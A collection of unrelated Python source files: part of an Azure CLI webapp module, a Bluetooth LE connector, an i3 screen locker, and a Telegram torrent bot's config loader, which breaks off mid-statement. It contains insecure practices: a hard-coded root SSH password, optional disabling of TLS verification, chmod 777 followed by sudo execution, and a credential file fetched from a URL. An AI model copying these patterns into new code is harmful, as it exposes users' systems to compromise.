# wake up kudu, by making an SCM call
import requests
# work around until the timeout limits issue for linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
cookies = {}
if instance is not None:
cookies['ARRAffinity'] = instance
requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify(),
cookies=cookies)
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None, instance=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
# Validate that we have a known instance (case-sensitive)
if instance is not None:
instances = list_instances(cmd, resource_group_name, name, slot=slot)
instance_names = set(i.name for i in instances)
if instance not in instance_names:
if slot is not None:
raise CLIError("The provided instance '{}' is not valid for this webapp and slot.".format(instance))
raise CLIError("The provided instance '{}' is not valid for this webapp.".format(instance))
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password, instance)
_ping_scm_site(cmd, resource_group_name, name, instance=instance)
_wait_for_webapp(tunnel_server)
return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
else:
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.is_alive():
time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
if timeout:
time.sleep(int(timeout))
else:
while s.is_alive() and t.is_alive():
time.sleep(5)
def perform_onedeploy(cmd,
resource_group_name,
name,
src_path=None,
src_url=None,
target_path=None,
artifact_type=None,
is_async=None,
restart=None,
clean=None,
ignore_stack=None,
timeout=None,
slot=None):
params = OneDeployParams()
params.cmd = cmd
params.resource_group_name = resource_group_name
params.webapp_name = name
params.src_path = src_path
params.src_url = src_url
params.target_path = target_path
params.artifact_type = artifact_type
params.is_async_deployment = is_async
params.should_restart = restart
params.is_clean_deployment = clean
params.should_ignore_stack = ignore_stack
params.timeout = timeout
params.slot = slot
return _perform_onedeploy_internal(params)
# Class for OneDeploy parameters
# pylint: disable=too-many-instance-attributes,too-few-public-methods
class OneDeployParams:
def __init__(self):
self.cmd = None
self.resource_group_name = None
self.webapp_name = None
self.src_path = None
self.src_url = None
self.artifact_type = None
self.is_async_deployment = None
self.target_path = None
self.should_restart = None
self.is_clean_deployment = None
self.should_ignore_stack = None
self.timeout = None
self.slot = None
# pylint: enable=too-many-instance-attributes,too-few-public-methods
def _build_onedeploy_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
deploy_url = scm_url + '/api/publish?type=' + params.artifact_type
if params.is_async_deployment is not None:
deploy_url = deploy_url + '&async=' + str(params.is_async_deployment)
if params.should_restart is not None:
deploy_url = deploy_url + '&restart=' + str(params.should_restart)
if params.is_clean_deployment is not None:
deploy_url = deploy_url + '&clean=' + str(params.is_clean_deployment)
if params.should_ignore_stack is not None:
deploy_url = deploy_url + '&ignorestack=' + str(params.should_ignore_stack)
if params.target_path is not None:
deploy_url = deploy_url + '&path=' + params.target_path
return deploy_url
def _get_onedeploy_status_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
return scm_url + '/api/deployments/latest'
def _get_basic_headers(params):
import urllib3
user_name, password = _get_site_credential(params.cmd.cli_ctx, params.resource_group_name,
params.webapp_name, params.slot)
if params.src_path:
content_type = 'application/octet-stream'
elif params.src_url:
content_type = 'application/json'
else:
raise CLIError('Unable to determine source location of the artifact being deployed')
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
headers['Content-Type'] = content_type
return headers
def _get_onedeploy_request_body(params):
import os
if params.src_path:
logger.info('Deploying from local path: %s', params.src_path)
try:
with open(os.path.realpath(os.path.expanduser(params.src_path)), 'rb') as fs:
body = fs.read()
except Exception as e:
raise CLIError("Either '{}' is not a valid local file path or you do not have permissions to access it"
.format(params.src_path)) from e
elif params.src_url:
logger.info('Deploying from URL: %s', params.src_url)
body = json.dumps({
"packageUri": params.src_url
})
else:
raise CLIError('Unable to determine source location of the artifact being deployed')
return body
def _update_artifact_type(params):
import ntpath
if params.artifact_type is not None:
return
# Interpret deployment type from the file extension if the type parameter is not passed
file_name = ntpath.basename(params.src_path)
file_extension = file_name.split(".", 1)[1]
if file_extension in ('war', 'jar', 'ear', 'zip'):
params.artifact_type = file_extension
elif file_extension in ('sh', 'bat'):
params.artifact_type = 'startup'
else:
params.artifact_type = 'static'
logger.warning("Deployment type: %s. To override deloyment type, please specify the --type parameter. "
"Possible values: war, jar, ear, zip, startup, script, static", params.artifact_type)
def _make_onedeploy_request(params):
import requests
from azure.cli.core.util import (
should_disable_connection_verify,
)
# Build the request body, headers, API URL and status URL
body = _get_onedeploy_request_body(params)
headers = _get_basic_headers(params)
deploy_url = _build_onedeploy_url(params)
deployment_status_url = _get_onedeploy_status_url(params)
logger.info("Deployment API: %s", deploy_url)
response = requests.post(deploy_url, data=body, headers=headers, verify=not should_disable_connection_verify())
# For debugging purposes only, you can change the async deployment into a sync deployment by polling the API status
# For that, set poll_async_deployment_for_debugging=True
poll_async_deployment_for_debugging = True
# check the status of async deployment
if response.status_code == 202:
response_body = None
if poll_async_deployment_for_debugging:
logger.info('Polloing the status of async deployment')
response_body = _check_zip_deployment_status(params.cmd, params.resource_group_name, params.webapp_name,
deployment_status_url, headers, params.timeout)
logger.info('Async deployment complete. Server response: %s', response_body)
return response_body
if response.status_code == 200:
return response
# API not available yet!
if response.status_code == 404:
raise CLIError("This API isn't available in this environment yet!")
# check if there's an ongoing process
if response.status_code == 409:
raise CLIError("Another deployment is in progress. You can track the ongoing deployment at {}"
.format(deployment_status_url))
# check if an error occured during deployment
if response.status_code:
raise CLIError("An error occured during deployment. Status Code: {}, Details: {}"
.format(response.status_code, response.text))
# OneDeploy
def _perform_onedeploy_internal(params):
# Update artifact type, if required
_update_artifact_type(params)
# Now make the OneDeploy API call
logger.info("Initiating deployment")
response = _make_onedeploy_request(params)
logger.info("Deployment has completed successfully")
return response
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError('SSH timeout, your app must be running before'
' it can accept SSH connections. '
'Use `az webapp log tail` to review the app startup logs.')
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
c.run('cat /etc/motd', pty=True)
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None): # pylint: disable=too-many-statements
import platform
if platform.system() == "Windows":
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise ValidationError("Only Linux App Service Plans supported, found a Windows App Service Plan")
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
open_page_in_browser(scm_url + '/webssh/host')
else:
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
raise ValidationError('Remote debugging is enabled, please disable')
create_tunnel_and_session(
cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout, instance=instance)
def create_devops_pipeline(
cmd,
functionapp_name=None,
organization_name=None,
project_name=None,
repository_name=None,
overwrite_yaml=None,
allow_force_push=None,
github_pat=None,
github_repository=None
):
from .azure_devops_build_interactive import AzureDevopsBuildInteractive
azure_devops_build_interactive = AzureDevopsBuildInteractive(cmd, logger, functionapp_name,
organization_name, project_name, repository_name,
overwrite_yaml, allow_force_push,
github_pat, github_repository)
return azure_devops_build_interactive.interactive_azure_devops_build()
def _configure_default_logging(cmd, rg_name, name):
logger.warning("Configuring default logging for the app, if not already enabled")
return config_diagnostics(cmd, rg_name, name,
application_logging=True, web_server_logging='filesystem',
docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
ase_is_id = is_valid_resource_id(ase)
if ase_is_id:
return ase
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Web',
type='hostingEnvironments',
name=ase)
def _validate_asp_sku(app_service_environment, sku):
# Isolated SKU is supported only for ASE
if sku.upper() in ['I1', 'I2', 'I3', 'I1V2', 'I2V2', 'I3V2']:
if not app_service_environment:
raise CLIError("The pricing tier 'Isolated' is not allowed for this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
else:
if app_service_environment:
raise CLIError("Only pricing tier 'Isolated' is allowed in this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
key_vault_is_id = is_valid_resource_id(key_vault)
if key_vault_is_id:
return key_vault
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.KeyVault',
type='vaults',
name=key_vault)
def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_host_name_bindings', slot)
verified_hostname_found = False
for hostname_binding in hostname_bindings:
binding_name = hostname_binding.name.split('/')[-1]
if binding_name.lower() == hostname and (hostname_binding.host_name_type == 'Verified' or
hostname_binding.host_name_type == 'Managed'):
verified_hostname_found = True
return verified_hostname_found
def update_host_key(cmd, resource_group_name, name, key_type, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_host_secret_slot(resource_group_name,
name,
key_type,
key_name,
slot,
name1=key_name,
value=key_value)
return client.web_apps.create_or_update_host_secret(resource_group_name,
name,
key_type,
key_name,
name1=key_name,
value=key_value)
def list_host_keys(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_host_keys_slot(resource_group_name, name, slot)
return client.web_apps.list_host_keys(resource_group_name, name)
def delete_host_key(cmd, resource_group_name, name, key_type, key_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
result = client.web_apps.delete_host_secret_slot(resource_group_name, name, key_type, key_name, slot, raw=True)
result = client.web_apps.delete_host_secret(resource_group_name, name, key_type, key_name, raw=True)
if result.response.status_code == HTTPStatus.NO_CONTENT:
return "Successfully deleted key '{}' of type '{}' from function app '{}'".format(key_name, key_type, name)
if result.response.status_code == HTTPStatus.NOT_FOUND:
return "Key '{}' of type '{}' does not exist in function app '{}'".format(key_name, key_type, name)
return result
def show_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.get_function(resource_group_name, name, function_name)
if result is None:
return "Function '{}' does not exist in app '{}'".format(function_name, name)
return result
def delete_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.delete_function(resource_group_name, name, function_name, raw=True)
if result.response.status_code == HTTPStatus.NO_CONTENT:
return "Successfully deleted function '{}' from app '{}'".format(function_name, name)
if result.response.status_code == HTTPStatus.NOT_FOUND:
return "Function '{}' does not exist in app '{}'".format(function_name, name)
return result
def update_function_key(cmd, resource_group_name, name, function_name, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_function_secret_slot(resource_group_name,
name,
function_name,
key_name,
slot,
name1=key_name,
value=key_value)
return client.web_apps.create_or_update_function_secret(resource_group_name,
name,
function_name,
key_name,
name1=key_name,
value=key_value)
def list_function_keys(cmd, resource_group_name, name, function_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_function_keys_slot(resource_group_name, name, function_name, slot)
return client.web_apps.list_function_keys(resource_group_name, name, function_name)
def delete_function_key(cmd, resource_group_name, name, key_name, function_name=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
result = client.web_apps.delete_function_secret_slot(resource_group_name,
name,
function_name,
key_name,
slot,
raw=True)
result = client.web_apps.delete_function_secret(resource_group_name, name, function_name, key_name, raw=True)
if result.response.status_code == HTTPStatus.NO_CONTENT:
return "Successfully deleted key '{}' from function '{}'".format(key_name, function_name)
if result.response.status_code == HTTPStatus.NOT_FOUND:
return "Key '{}' does not exist in function '{}'".format(key_name, function_name)
return result
|
ble_task_rpi.py
|
import time
import os
import json
import queue
import base64
import pexpect
from typing import Optional
from threading import Thread
from modi.task.conn_task import ConnTask
from modi.util.miscellaneous import ask_modi_device
class BleTask(ConnTask):
def __init__(self, verbose=False, uuid=None):
print("Initiating ble_task connection...")
script = os.path.join(os.path.dirname(__file__), 'change_interval.sh')
os.system(f'chmod 777 {script}')
os.system(f'sudo {script}')
super().__init__(verbose=verbose)
self._bus = None
self.__uuid = uuid
self._recv_q = queue.Queue()
self.__close_event = False
@property
def bus(self):
return self._bus
def __find_modi_device(self):
scanner = pexpect.spawn('sudo hcitool lescan')
init_time = time.time()
devices = []
while time.time() - init_time < 1:
info = scanner.readline()
info = info.decode().split()
if 'MODI' in info[1] and info[1] not in (d[1] for d in devices):
devices.append(info)
scanner.terminate()
if not self.__uuid:
self.__uuid = ask_modi_device([d[1].upper() for d in devices])
for info in devices:
if self.__uuid.upper() in info[1].upper():
return info
raise ValueError('MODI network module does not exist!')
def __reset(self):
os.system('sudo hciconfig hci0 down')
os.system('sudo hciconfig hci0 up')
def open_conn(self):
self.__reset()
modi_device = self.__find_modi_device()
print(f'Connecting to {modi_device[1]}...')
self.__reset()
self._bus = pexpect.spawn('gatttool -I')
self._bus.expect('LE')
for _ in range(5):
try:
self._bus.sendline(f'connect {modi_device[0]}')
self._bus.expect('Connection successful', timeout=1)
Thread(daemon=True, target=self.__ble_read).start()
break
except Exception:
print('...')
def close_conn(self):
# Reboot modules to stop receiving channel messages
self.__close_event = True
self.send('{"c":9,"s":0,"d":4095,"b":"Bgg=","l":2}')
time.sleep(0.5)
self._bus.sendline('disconnect')
self._bus.terminate()
os.system("sudo hciconfig hci0 down")
def __ble_read(self):
"""
handle -- integer, characteristic read handle the data was received on
value -- bytearray, the data returned in the notification
"""
while True:
try:
self._bus.expect('value: .*?\r', timeout=0.5)
except Exception:
continue
msg = self._bus.after.decode().lstrip('value: ').split()
json_msg = self.__parse_ble_msg(
bytearray([int(b, 16) for b in msg]))
if self.verbose:
print(f"recv: {json_msg}")
self._recv_q.put(json_msg)
if self.__close_event:
break
time.sleep(0.002)
@ConnTask.wait
def send(self, pkt: str) -> None:
self.send_nowait(pkt)
def send_nowait(self, pkt: str) -> None:
json_msg = json.loads(pkt)
ble_msg = self.__compose_ble_msg(json_msg)
if self.verbose:
print(f"send: {json_msg}")
self._bus.sendline(f'char-write-cmd 0x002a {ble_msg}')
def recv(self) -> Optional[str]:
if self._recv_q.empty():
return None
return self._recv_q.get()
#
# Ble Helper Methods
#
@staticmethod
def __compose_ble_msg(json_msg):
ble_msg = bytearray(16)
ins = json_msg["c"]
sid = json_msg["s"]
did = json_msg["d"]
dlc = json_msg["l"]
data = json_msg["b"]
ble_msg[0] = ins & 0xFF
ble_msg[1] = ins >> 8 & 0xFF
ble_msg[2] = sid & 0xFF
ble_msg[3] = sid >> 8 & 0xFF
ble_msg[4] = did & 0xFF
ble_msg[5] = did >> 8 & 0xFF
ble_msg[6] = dlc & 0xFF
ble_msg[7] = dlc >> 8 & 0xFF
ble_msg[8:8 + dlc] = bytearray(base64.b64decode(data))
data = ""
for b in ble_msg:
data += f'{b:02X}'
return data
@staticmethod
def __parse_ble_msg(ble_msg):
json_msg = dict()
json_msg["c"] = ble_msg[1] << 8 | ble_msg[0]
json_msg["s"] = ble_msg[3] << 8 | ble_msg[2]
json_msg["d"] = ble_msg[5] << 8 | ble_msg[4]
json_msg["l"] = ble_msg[7] << 8 | ble_msg[6]
json_msg["b"] = base64.b64encode(ble_msg[8:]).decode("utf-8")
return json.dumps(json_msg, separators=(",", ":"))
|
matrixlock.py
|
#!/usr/bin/python3
from argparse import ArgumentParser
from http.server import BaseHTTPRequestHandler, HTTPServer
from os.path import dirname, join
from subprocess import run, Popen, DEVNULL
from threading import Thread, Event
from time import time
import json
def main(matrix_delay_secs, terminal, locker):
workspaces = get_workspaces()
visible = [ws for ws in workspaces if ws['visible']]
with SubprocessServer(('', 0), len(visible)) as server:
port = server.server_address[1]
for ws in visible:
overlay_matrix_on_workspace(ws['name'], port, matrix_delay_secs, terminal, len(visible))
if locker == 'xtrlock':
run(['xtrlock'], check=True)
else:
run(['i3lock', '-n'], check=True)
for pid_path in server.received_posts:
assert pid_path.startswith('/'), pid_path
try:
pid = int(pid_path[1:])
except ValueError:
continue
run(['kill', str(pid)])
def get_workspaces():
cp = run(
['i3-msg', '-t', 'get_workspaces'],
capture_output=True, check=True, text=True
)
return json.loads(cp.stdout)
def overlay_matrix_on_workspace(ws_name, port, delay, terminal, visible_wss):
# Send child PID to server so the parent can kill it, then show Matrix:
pid_server_command = f'bash -c \'curl -X POST localhost:{port}/$$ && sleep {delay} && cmatrix -b\''
# terminal command
terminal_command = f'exec "xfce4-terminal --hide-scrollbar --hide-menubar --fullscreen --color-text=black -x {pid_server_command}"'
if terminal == 'urxvt':
# in order to this to be fullscreen add the following line in .i3/conf file:
# for_window [instance="^matrixlock$"] fullscreen
terminal_command = f'exec "urxvt -bg Black -name matrixlock -e {pid_server_command}"'
# workspace command (if one ws visible we don't want to change)
workspace_command = ''
if visible_wss > 1:
workspace_command = f'workspace {ws_name}; '
run([
'i3-msg',
f'{workspace_command} '
# There may already be a full-screen app on that workspace.
# This would prevent us from showing the Matrix full-screen.
# So disable fullscreen first.
f'fullscreen disable; '
# --color-text=black to hide the cursor when there is a delay.
f'{terminal_command} '
], check=True, stdout=DEVNULL)
class SubprocessServer(HTTPServer):
"""
Process up to num_requests POST requests in up to timeout_secs seconds and
store their paths in self.received_posts.
"""
def __init__(self, server_address, num_requests, timeout_secs=5):
super().__init__(server_address, SubprocessHandler)
self.received_posts = []
self._num_requests = num_requests
self._timeout_secs = timeout_secs
self._thread = Thread(target=self._run_in_thread)
self._started = Event()
self._timeout_encountered = False
def __enter__(self):
result = super().__enter__()
self._thread.start()
self._started.wait()
return result
def __exit__(self, *args, **kwargs):
self._thread.join()
def _run_in_thread(self):
self._started.set()
end = time() + self._timeout_secs
for _ in range(self._num_requests):
time_remaining = end - time()
if time_remaining < 0:
break
self.timeout = time_remaining
self.handle_request()
if self._timeout_encountered:
break
def handle_timeout(self):
self._timeout_encountered = True
class SubprocessHandler(BaseHTTPRequestHandler):
def do_POST(self):
self.server.received_posts.append(self.path)
self.send_response(200)
self.end_headers()
def log_message(self, format, *args):
return
if __name__ == '__main__':
parser = ArgumentParser(description='Alternative to i3lock that displays the Matrix')
parser.add_argument(
'delay', type=int, nargs='?', default=0,
help='Seconds between blanking out the screen and starting the Matrix'
)
parser.add_argument(
'--locker',help='The locker to use', default='i3lock'
)
parser.add_argument(
'--terminal',help='The terminal to use (if using uxrvt, please set the instance to be fullscreen in conf)', default='xfce4-terminal'
)
args = parser.parse_args()
main(args.delay,args.terminal,args.locker)
|
__init__.py
|
import logging
import socket
import faulthandler
from telegram.ext import Updater as tgUpdater
from qbittorrentapi import Client as qbClient
from aria2p import API as ariaAPI, Client as ariaClient
from os import remove as osremove, path as ospath, environ
from requests import get as rget
from json import loads as jsnloads
from subprocess import Popen, run as srun, check_output
from time import sleep, time
from threading import Thread, Lock
from pyrogram import Client
from dotenv import load_dotenv
faulthandler.enable()
socket.setdefaulttimeout(600)
botStartTime = time()
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
handlers=[logging.FileHandler('log.txt'), logging.StreamHandler()],
level=logging.INFO)
LOGGER = logging.getLogger(__name__)
load_dotenv('config.env', override=True)
def getConfig(name: str):
return environ[name]
try:
NETRC_URL = getConfig('NETRC_URL')
if len(NETRC_URL) == 0:
raise KeyError
try:
res = rget(NETRC_URL)
if res.status_code == 200:
with open('.netrc', 'wb+') as f:
f.write(res.content)
else:
logging.error(f"Failed to download .netrc {res.status_code}")
except Exception as e:
logging.error(f"NETRC_URL: {e}")
except KeyError:
pass
try:
SERVER_PORT = getConfig('SERVER_PORT')
if len(SERVER_PORT) == 0:
raise KeyError
except KeyError:
SERVER_PORT = 80
PORT = environ.get('PORT', SERVER_PORT)
web = Popen([f"gunicorn web.wserver:app --bind 0.0.0.0:{PORT}"], shell=True)
alive = Popen(["python3", "alive.py"])
srun(["qbittorrent-nox", "-d", "--profile=."])
if not ospath.exists('.netrc'):
srun(["touch", ".netrc"])
srun(["cp", ".netrc", "/root/.netrc"])
srun(["chmod", "600", ".netrc"])
srun(["chmod", "+x", "aria.sh"])
a2c = Popen(["./aria.sh"], shell=True)
sleep(1)
Interval = []
DRIVES_NAMES = []
DRIVES_IDS = []
INDEX_URLS = []
try:
if bool(getConfig('_____REMOVE_THIS_LINE_____')):
logging.error('The README.md file there to be read! Exiting now!')
exit()
except KeyError:
pass
aria2 = ariaAPI(
ariaClient(
host="http://localhost",
port=6800,
secret="",
)
)
def get_client():
return qbClient(host="localhost", port=8090)
trackers = check_output(["curl -Ns https://raw.githubusercontent.com/XIU2/TrackersListCollection/master/all.txt https://ngosang.github.io/trackerslist/trackers_all_http.txt https://newtrackon.com/api/all | awk '$0'"], shell=True).decode('utf-8')
trackerslist = set(trackers.split("\n"))
trackerslist.remove("")
trackerslist = "\n\n".join(trackerslist)
get_client().application.set_preferences({"add_trackers": f"{trackerslist}"})
DOWNLOAD_DIR = None
BOT_TOKEN = None
download_dict_lock = Lock()
status_reply_dict_lock = Lock()
# Key: update.effective_chat.id
# Value: telegram.Message
status_reply_dict = {}
# Key: update.message.message_id
# Value: An object of Status
download_dict = {}
# key: rss_title
# value: [rss_feed, last_link, last_title, filter]
rss_dict = {}
AUTHORIZED_CHATS = set()
SUDO_USERS = set()
AS_DOC_USERS = set()
AS_MEDIA_USERS = set()
if ospath.exists('authorized_chats.txt'):
with open('authorized_chats.txt', 'r+') as f:
lines = f.readlines()
for line in lines:
AUTHORIZED_CHATS.add(int(line.split()[0]))
if ospath.exists('sudo_users.txt'):
with open('sudo_users.txt', 'r+') as f:
lines = f.readlines()
for line in lines:
SUDO_USERS.add(int(line.split()[0]))
try:
achats = getConfig('AUTHORIZED_CHATS')
achats = achats.split(" ")
for chats in achats:
AUTHORIZED_CHATS.add(int(chats))
except:
pass
try:
schats = getConfig('SUDO_USERS')
schats = schats.split(" ")
for chats in schats:
SUDO_USERS.add(int(chats))
except:
pass
try:
BOT_TOKEN = getConfig('BOT_TOKEN')
parent_id = getConfig('GDRIVE_FOLDER_ID')
DOWNLOAD_DIR = getConfig('DOWNLOAD_DIR')
if not DOWNLOAD_DIR.endswith("/"):
DOWNLOAD_DIR = DOWNLOAD_DIR + '/'
DOWNLOAD_STATUS_UPDATE_INTERVAL = int(getConfig('DOWNLOAD_STATUS_UPDATE_INTERVAL'))
OWNER_ID = int(getConfig('OWNER_ID'))
AUTO_DELETE_MESSAGE_DURATION = int(getConfig('AUTO_DELETE_MESSAGE_DURATION'))
TELEGRAM_API = getConfig('TELEGRAM_API')
TELEGRAM_HASH = getConfig('TELEGRAM_HASH')
except KeyError as e:
LOGGER.error("One or more env variables missing! Exiting now")
exit(1)
LOGGER.info("Generating BOT_STRING_SESSION")
app = Client('pyrogram', api_id=int(TELEGRAM_API), api_hash=TELEGRAM_HASH, bot_token=BOT_TOKEN, no_updates=True)
try:
USER_STRING_SESSION = getConfig('USER_STRING_SESSION')
if len(USER_STRING_SESSION) == 0:
raise KeyError
except KeyError:
USER_STRING_SESSION = None
if USER_STRING_SESSION is not None:
rss_session = Client(USER_STRING_SESSION, api_id=int(TELEGRAM_API), api_hash=TELEGRAM_HASH)
else:
rss_session = None
def aria2c_init():
try:
logging.info("Initializing Aria2c")
link = "https://releases.ubuntu.com/21.10/ubuntu-21.10-desktop-amd64.iso.torrent"
dire = DOWNLOAD_DIR.rstrip("/")
aria2.add_uris([link], {'dir': dire})
sleep(3)
downloads = aria2.get_downloads()
sleep(30)
for download in downloads:
aria2.remove([download], force=True, files=True)
except Exception as e:
logging.error(f"Aria2c initializing error: {e}")
pass
if not ospath.isfile(".restartmsg"):
sleep(1)
Thread(target=aria2c_init).start()
sleep(1.5)
try:
DB_URI = getConfig('DATABASE_URL')
if len(DB_URI) == 0:
raise KeyError
except KeyError:
DB_URI = None
try:
TG_SPLIT_SIZE = getConfig('TG_SPLIT_SIZE')
if len(TG_SPLIT_SIZE) == 0 or int(TG_SPLIT_SIZE) > 2097151000:
raise KeyError
else:
TG_SPLIT_SIZE = int(TG_SPLIT_SIZE)
except KeyError:
TG_SPLIT_SIZE = 2097151000
try:
STATUS_LIMIT = getConfig('STATUS_LIMIT')
if len(STATUS_LIMIT) == 0:
raise KeyError
else:
STATUS_LIMIT = int(STATUS_LIMIT)
except KeyError:
STATUS_LIMIT = None
try:
MEGA_API_KEY = getConfig('MEGA_API_KEY')
if len(MEGA_API_KEY) == 0:
raise KeyError
except KeyError:
logging.warning('MEGA API KEY not provided!')
MEGA_API_KEY = None
try:
MEGA_EMAIL_ID = getConfig('MEGA_EMAIL_ID')
MEGA_PASSWORD = getConfig('MEGA_PASSWORD')
if len(MEGA_EMAIL_ID) == 0 or len(MEGA_PASSWORD) == 0:
raise KeyError
except KeyError:
logging.warning('MEGA Credentials not provided!')
MEGA_EMAIL_ID = None
MEGA_PASSWORD = None
try:
UPTOBOX_TOKEN = getConfig('UPTOBOX_TOKEN')
if len(UPTOBOX_TOKEN) == 0:
raise KeyError
except KeyError:
UPTOBOX_TOKEN = None
try:
INDEX_URL = getConfig('INDEX_URL').rstrip("/")
if len(INDEX_URL) == 0:
raise KeyError
else:
INDEX_URLS.append(INDEX_URL)
except KeyError:
INDEX_URL = None
INDEX_URLS.append(None)
try:
SEARCH_API_LINK = getConfig('SEARCH_API_LINK').rstrip("/")
if len(SEARCH_API_LINK) == 0:
raise KeyError
except KeyError:
SEARCH_API_LINK = None
try:
SEARCH_LIMIT = getConfig('SEARCH_LIMIT')
if len(SEARCH_LIMIT) == 0:
raise KeyError
else:
SEARCH_LIMIT = int(SEARCH_LIMIT)
except KeyError:
SEARCH_LIMIT = 0
try:
RSS_COMMAND = getConfig('RSS_COMMAND')
if len(RSS_COMMAND) == 0:
raise KeyError
except KeyError:
RSS_COMMAND = None
try:
CMD_INDEX = getConfig('CMD_INDEX')
if len(CMD_INDEX) == 0:
raise KeyError
except KeyError:
CMD_INDEX = ''
try:
TORRENT_DIRECT_LIMIT = getConfig('TORRENT_DIRECT_LIMIT')
if len(TORRENT_DIRECT_LIMIT) == 0:
raise KeyError
else:
TORRENT_DIRECT_LIMIT = float(TORRENT_DIRECT_LIMIT)
except KeyError:
TORRENT_DIRECT_LIMIT = None
try:
CLONE_LIMIT = getConfig('CLONE_LIMIT')
if len(CLONE_LIMIT) == 0:
raise KeyError
else:
CLONE_LIMIT = float(CLONE_LIMIT)
except KeyError:
CLONE_LIMIT = None
try:
MEGA_LIMIT = getConfig('MEGA_LIMIT')
if len(MEGA_LIMIT) == 0:
raise KeyError
else:
MEGA_LIMIT = float(MEGA_LIMIT)
except KeyError:
MEGA_LIMIT = None
try:
STORAGE_THRESHOLD = getConfig('STORAGE_THRESHOLD')
if len(STORAGE_THRESHOLD) == 0:
raise KeyError
else:
STORAGE_THRESHOLD = float(STORAGE_THRESHOLD)
except KeyError:
STORAGE_THRESHOLD = None
try:
